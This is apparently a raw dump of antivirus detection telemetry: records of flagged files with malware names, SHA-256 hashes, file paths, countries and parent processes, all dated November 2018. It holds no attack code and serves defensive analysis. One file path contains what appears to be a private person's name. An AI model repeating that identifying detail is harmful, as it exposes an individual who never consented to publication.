  Row(detection=Row(filename='ma tran toan 5.exe', filepath='G:\\\xa0\\NAM HOC 2017-2018n\\ma tran toan 5.exe', filesize=1664000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='0cd1a613e871e459906b02e7a504ac121fec2540a552c77ff1b0398b976a99d0', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Microsoft Security Client\\MsMpEng.exe', parentsize=119864, timestamp='2018-11-04T10:16:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ma tran toan 5.exe', filepath='G:\\\xa0\\NAM HOC 2017-2018n\\ma tran toan 5.exe', filesize=1664000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='0cd1a613e871e459906b02e7a504ac121fec2540a552c77ff1b0398b976a99d0', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Microsoft Security Client\\MsMpEng.exe', parentsize=119864, timestamp='2018-11-04T10:49:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='0d1593e54e93e09077e3ca8722f813d99da89241786fbc8a9bbce08446682b95', metadata=Row(cmdline='\\\\\\/FromInstall', country='MD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Auslogics\\Anti-Malware\\AntiMalware.exe', parentsize=1906248, timestamp='2018-11-04T18:58:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='0d1593e54e93e09077e3ca8722f813d99da89241786fbc8a9bbce08446682b95', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-04T07:19:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-210041-5ddae1d5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_eb77e4c9\\AVSCAN-20181104-210000-5960DD46\\AVSCAN-20181104-210041-5DDAE1D5', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='0d1593e54e93e09077e3ca8722f813d99da89241786fbc8a9bbce08446682b95', metadata=Row(cmdline=None, country='MD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:00:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-210034-5d1ce4b3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_eb77e4c9\\AVSCAN-20181104-210000-5960DD46\\AVSCAN-20181104-210034-5D1CE4B3', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='0d1593e54e93e09077e3ca8722f813d99da89241786fbc8a9bbce08446682b95', metadata=Row(cmdline=None, country='MD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:00:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-210022-5bcc4126', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_eb77e4c9\\AVSCAN-20181104-210000-5960DD46\\AVSCAN-20181104-210022-5BCC4126', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='0d1593e54e93e09077e3ca8722f813d99da89241786fbc8a9bbce08446682b95', metadata=Row(cmdline=None, country='MD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:00:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='0d1593e54e93e09077e3ca8722f813d99da89241786fbc8a9bbce08446682b95', metadata=Row(cmdline=None, country='MK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T18:41:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='flashupdate (2).exe', filepath='C:\\Users\\X\\Downloads\\flashupdate (2).exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='0d1593e54e93e09077e3ca8722f813d99da89241786fbc8a9bbce08446682b95', metadata=Row(cmdline='\\\\\\/FromInstall', country='MD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Auslogics\\Anti-Malware\\AntiMalware.exe', parentsize=1906248, timestamp='2018-11-04T18:58:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='flashupdate (1).exe', filepath='C:\\Users\\X\\Downloads\\flashupdate (1).exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='0d1593e54e93e09077e3ca8722f813d99da89241786fbc8a9bbce08446682b95', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2868224, timestamp='2018-11-04T00:49:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='flashupdate (1).exe', filepath='C:\\Users\\X\\Downloads\\flashupdate (1).exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='0d1593e54e93e09077e3ca8722f813d99da89241786fbc8a9bbce08446682b95', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2868224, timestamp='2018-11-04T00:49:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='0d1593e54e93e09077e3ca8722f813d99da89241786fbc8a9bbce08446682b95', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-04T22:26:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='flashupdate (1).exe', filepath='C:\\Users\\X\\Downloads\\flashupdate (1).exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='0d1593e54e93e09077e3ca8722f813d99da89241786fbc8a9bbce08446682b95', metadata=Row(cmdline='\\\\\\/FromInstall', country='MD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Auslogics\\Anti-Malware\\AntiMalware.exe', parentsize=1906248, timestamp='2018-11-04T18:58:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-205100-ffafd880', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_312b1817\\AVSCAN-20181104-205034-FC074942\\AVSCAN-20181104-205100-FFAFD880', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='0d1593e54e93e09077e3ca8722f813d99da89241786fbc8a9bbce08446682b95', metadata=Row(cmdline=None, country='AZ', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T16:51:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-142853-92a8f6e1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c6cdc580\\AVSCAN-20181104-142729-89022BDE\\AVSCAN-20181104-142853-92A8F6E1', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='0d1593e54e93e09077e3ca8722f813d99da89241786fbc8a9bbce08446682b95', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T07:29:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-205122-02bd3cae', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_312b1817\\AVSCAN-20181104-205034-FC074942\\AVSCAN-20181104-205122-02BD3CAE', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='0d1593e54e93e09077e3ca8722f813d99da89241786fbc8a9bbce08446682b95', metadata=Row(cmdline=None, country='AZ', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T16:51:23Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='0d1593e54e93e09077e3ca8722f813d99da89241786fbc8a9bbce08446682b95', metadata=Row(cmdline=None, country='MK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:08:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0003dfd0', filepath='C:\\Windows\\Temp\\2506595e-9777-4d59-b538-5440db77ee06\\tmp00003411\\tmp0003dfd0', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='0d1593e54e93e09077e3ca8722f813d99da89241786fbc8a9bbce08446682b95', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\adaware\\adaware antivirus\\adaware antivirus\\12.4.942.11595\\AdAwareService.exe', parentsize=542896, timestamp='2018-11-04T09:16:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\New folder (3)\\New folder\\New folder (2)\\New folder\\New folder (2)\\Video\\flashupdate.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='0d1593e54e93e09077e3ca8722f813d99da89241786fbc8a9bbce08446682b95', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe3_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe3 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-04T07:54:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-193829-0a99a6eb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c94b811b\\AVSCAN-20181104-193736-00089EE6\\AVSCAN-20181104-193829-0A99A6EB', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='0d1593e54e93e09077e3ca8722f813d99da89241786fbc8a9bbce08446682b95', metadata=Row(cmdline=None, country='HR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T18:38:31Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='flashupdate (1).exe', filepath='C:\\Users\\X\\Downloads\\New folder (3)\\New folder\\New folder (2)\\New folder\\New folder (2)\\Video\\flashupdate (1).exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='0d1593e54e93e09077e3ca8722f813d99da89241786fbc8a9bbce08446682b95', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe3_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe3 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-04T07:54:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='flashupdate (2).exe', filepath='C:\\Users\\X\\Downloads\\flashupdate (2).exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='0d1593e54e93e09077e3ca8722f813d99da89241786fbc8a9bbce08446682b95', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2613248, timestamp='2018-11-04T13:49:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='flashupdate (1).exe', filepath='C:\\Users\\X\\Downloads\\flashupdate (1).exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='0d1593e54e93e09077e3ca8722f813d99da89241786fbc8a9bbce08446682b95', metadata=Row(cmdline=None, country='HR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2871808, timestamp='2018-11-04T18:36:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-154932-e543143e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2d69d52e\\AVSCAN-20181104-154918-E2D1DDCA\\AVSCAN-20181104-154932-E543143E', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='0d1593e54e93e09077e3ca8722f813d99da89241786fbc8a9bbce08446682b95', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T13:49:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181105-064012-bce52995', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_4580d2bc\\AVSCAN-20181105-063846-B1E3D195\\AVSCAN-20181105-064012-BCE52995', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='0d1593e54e93e09077e3ca8722f813d99da89241786fbc8a9bbce08446682b95', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T22:40:19Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ewogxhf.exe', filepath='\\\\?\\E:\\PASTOR ELOY GARCIA C\\AppData\\Local\\ewogxhf.exe', filesize=3072000, name='ADWARE/Lollipop.Gen4.#M300.#R300075'), hash='0d299e2f10838d95aea903ad8570e2add8321f78d88f18987c01407de7f8861b', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T17:02:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ewogxhf.exe', filepath='\\\\?\\E:\\PASTOR ELOY GARCIA C\\AppData\\Local\\ewogxhf.exe', filesize=3072000, name='ADWARE/Lollipop.Gen4.#M300.#R300075'), hash='0d299e2f10838d95aea903ad8570e2add8321f78d88f18987c01407de7f8861b', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T17:02:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ewogxhf.exe', filepath='\\\\?\\E:\\PASTOR ELOY GARCIA C\\AppData\\Local\\ewogxhf.exe', filesize=3072000, name='ADWARE/Lollipop.Gen4.#M300.#R300075'), hash='0d299e2f10838d95aea903ad8570e2add8321f78d88f18987c01407de7f8861b', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:13:50Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181105-060938-5be6ea98', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_48106572\\AVSCAN-20181105-015935-A564B04D\\AVSCAN-20181105-060938-5BE6EA98', filesize=3660000, name='PUA/Widdit.Gen4.#M300.#R5744'), hash='0d45ee8ce4b621210cea7a0da2ac15ab79f40cc31f098ebe8879522c502ef598', metadata=Row(cmdline=None, country='JP', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T21:09:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='xcoresys.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Roaming\\WinSys\\xcoresys.exe', filesize=512000, name='TR/Kryptik.xzcry.#M1.#R1'), hash='0d50249fa32ba88699979e3dd5cc4d34226f9206f8315c5a8ad4261a648834b0', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T06:38:51Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='coresys.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Roaming\\WinSys\\coresys.exe', filesize=512000, name='TR/Kryptik.xzcry.#M1.#R1'), hash='0d50249fa32ba88699979e3dd5cc4d34226f9206f8315c5a8ad4261a648834b0', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T06:38:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-134044-620a8c4f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_4ba32583\\AVSCAN-20181104-123253-424E92FB\\AVSCAN-20181104-134044-620A8C4F', filesize=128000, name='PUA/Outbrowse.Gen.#M1.#R1'), hash='0d5a3df5448512e7ab2096c0235b347ae9733c3c29b06d8860ca4d61c3623cf3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:40:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='setup (1).exe', filepath='C:\\Users\\X\\Downloads\\setup (1).exe', filesize=588000, name='PUA/Outbrowse.Gen.#M300.#R5962'), hash='0d9206094bb544f8dccce4769f52c167f2fc4aac3b1e6eecfb47053bc5da7b9d', metadata=Row(cmdline=None, country='RS', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc='C:\\Windows\\explorer.exe', parentsize=2391280, timestamp='2018-11-04T14:19:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-062205-ec335d12', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_406863cc\\AVSCAN-20181104-062019-E3A6562C\\AVSCAN-20181104-062205-EC335D12', filesize=588000, name='PUA/Outbrowse.Gen.#M300.#R5962'), hash='0d9206094bb544f8dccce4769f52c167f2fc4aac3b1e6eecfb47053bc5da7b9d', metadata=Row(cmdline=None, country='RS', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T14:21:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-185348-64f06509', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8006e641\\AVSCAN-20181104-185238-58A70FCE\\AVSCAN-20181104-185348-64F06509', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='0db8d2133327b4b22206fee7412826e1843df743358048be655c045258de3207', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T17:53:50Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-163053-4571f53d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181104-163046-44AB2C33\\AVSCAN-20181104-163053-4571F53D', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='0db8d2133327b4b22206fee7412826e1843df743358048be655c045258de3207', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:30:53Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='flash_update.exe', filepath='C:\\Users\\X\\Downloads\\flash_update.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='0db8d2133327b4b22206fee7412826e1843df743358048be655c045258de3207', metadata=Row(cmdline='rtp', country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1630208, timestamp='2018-11-04T17:50:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='flash_update.exe', filepath='\\\\?\\C:\\Users\\X\\Downloads\\flash_update.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='0db8d2133327b4b22206fee7412826e1843df743358048be655c045258de3207', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T13:37:24Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='hl.exe:xguard', filepath='\\\\?\\C:\\Users\\X\\Desktop\\Counter-Strike\\hl.exe:xguard', filesize=448000, name='HEUR/APC.#M1.#R1'), hash='0dcb5d826951e384eae566b477639eae50e4e0d186e58047c6de99f512d96410', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T13:24:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='hl.exe:xguard', filepath='\\\\?\\D:\\Games\\Counter Strike 1.6 Русская v43\\hl.exe:xguard', filesize=448000, name='HEUR/APC.#M1.#R1'), hash='0dcb5d826951e384eae566b477639eae50e4e0d186e58047c6de99f512d96410', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:43:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='hl.exe:xguard', filepath='\\?\\C:\\Games\\Counter-Strike\\hl.exe:xguard', filesize=448000, name='HEUR/APC.#M1.#R1'), hash='0dcb5d826951e384eae566b477639eae50e4e0d186e58047c6de99f512d96410', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T16:55:05Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='pegawai.exe', filepath='F:\\Users\\X\\Exeprog\\Pegawai.exe', filesize=320000, name='W32/Virut.Gen.#M1.#R1'), hash='0f288d754b7aa03647f982fffeb4b0e6921e0f1259876f86474ec3bd5202ad4d', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Microsoft Security Client\\MsMpEng.exe', parentsize=23784, timestamp='2018-11-04T08:28:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='apds.dll', filepath='D:\\Windows\\SoftwareDistribution\\Download\\6d722766bb82e0437d0d3556b5f02309\\x86_microsoft-windows-servicingstack_31bf3856ad364e35_6.1.7601.23505_none_0bfc08bf3ea166ba\\apds.dll', filesize=1856000, name='W32/Ramnit.CD.#M1.#R1'), hash='10bae81cbdd98a83487262b33e98969a1c733aa6a40c791b6737e712889e6e02', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe', parentsize=1426264, timestamp='2018-11-04T11:01:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='apds.dll', filepath='D:\\Windows\\SoftwareDistribution\\Download\\6d722766bb82e0437d0d3556b5f02309\\x86_microsoft-windows-servicingstack_31bf3856ad364e35_6.1.7601.23505_none_0bfc08bf3ea166ba\\apds.dll', filesize=1856000, name='W32/Ramnit.CD.#M1.#R1'), hash='10bae81cbdd98a83487262b33e98969a1c733aa6a40c791b6737e712889e6e02', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe', parentsize=1426264, timestamp='2018-11-04T12:53:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='dccw.exe', filepath='E:\\Windows\\System32\\dccw.exe', filesize=896000, name='TR/Patched.Ren.Gen.#M300.#R2947'), hash='1148c9091e120f00e686b6e47097c37786b865d5ed4ea6c7bdcd82f036f1869e', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe3_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe3 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-04T11:27:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='dccw.exe', filepath='E:\\Windows\\System32\\dccw.exe', filesize=896000, name='TR/Patched.Ren.Gen.#M300.#R2947'), hash='1148c9091e120f00e686b6e47097c37786b865d5ed4ea6c7bdcd82f036f1869e', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe15_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe15 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-04T14:29:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='dccw.exe', filepath='E:\\Windows\\System32\\dccw.exe', filesize=896000, name='TR/Patched.Ren.Gen.#M300.#R2947'), hash='1148c9091e120f00e686b6e47097c37786b865d5ed4ea6c7bdcd82f036f1869e', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe19_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe19 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-04T11:04:58Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='dccw.exe', filepath='E:\\Windows\\System32\\dccw.exe', filesize=896000, name='TR/Patched.Ren.Gen.#M300.#R2947'), hash='1148c9091e120f00e686b6e47097c37786b865d5ed4ea6c7bdcd82f036f1869e', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe13_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe13 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-04T06:02:41Z'), dt=datetime.date(2018, 11, 4)),
